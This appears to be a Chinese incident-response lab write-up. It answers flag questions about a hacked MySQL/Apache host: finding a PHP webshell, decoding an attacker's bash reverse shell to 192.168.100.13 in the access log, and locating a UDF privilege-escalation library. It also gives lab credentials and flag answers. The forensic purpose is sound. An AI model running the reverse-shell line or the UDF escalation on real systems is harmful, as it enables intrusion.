第二章 日志分析-mysql应急响应

文章发布时间:

最后更新时间:

文章总字数:
486

预计阅读时间:
2 分钟

页面浏览: 加载中...

简介:

mysql应急响应 ssh账号 root 密码 xjmysql
ssh env.xj.edisec.net -p xxxxx
1.黑客第一次写入的shell flag{关键字符串}
2.黑客反弹shell的ip flag{ip}
3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx
4.黑客获取的权限 flag{whoami后的值}

1.

黑客第一次写入的shell flag{关键字符串}

查看网站目录 /var/www/html ,有个 sh.php 文件比较可疑,查看一下发现一句话木马,flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}

image

2.

黑客反弹shell的ip flag{ip}

我们到网站目录,搜索一下mysql登陆的凭证,进入mysql查看下日志的目录,很遗憾mysql没有开启日志记录

image

image

这里我们猜测是用sql注入的方式攻击的,在 /var/log 目录下有apache,我们分析 /var/log/apache2/access.log

image

可以发现存在sql注入攻击,由于存在URL编码,我们将 access.log 下载到本地,用 notepad++ 解码,发现存在 base64 编码后的反弹shell特征,解码后bash -i >&/dev/tcp/192.168.100.13/777 0>&1,flag{192.168.100.13}

image

image

3.

黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx

利用 mysql 提权,首先想到 udf 提权,该提权方法需要向 mysql 插件目录写入动态链接库文件,故可用 find 搜索是否存在该类文件,命令为find / -path '*/plugin/*' -name '*.so' 2>/dev/null,发现有两个疑似 udf 提权的文件,经测试提权的文件是 /usr/lib/mysql/plugin/udf.so ,flag{b1818bde4e310f3d23f1005185b973e7}

image

image

看了巨魔的WP,发现可以进 mysql 查询 mysql 的 func 列表,如下:

image

4.

黑客获取的权限 flag{whoami后的值}

根据前面第二题注入的 mysql 代码,我们进 mysql 执行下 udf 中的 sys_eval 函数即可,flag{mysql}

image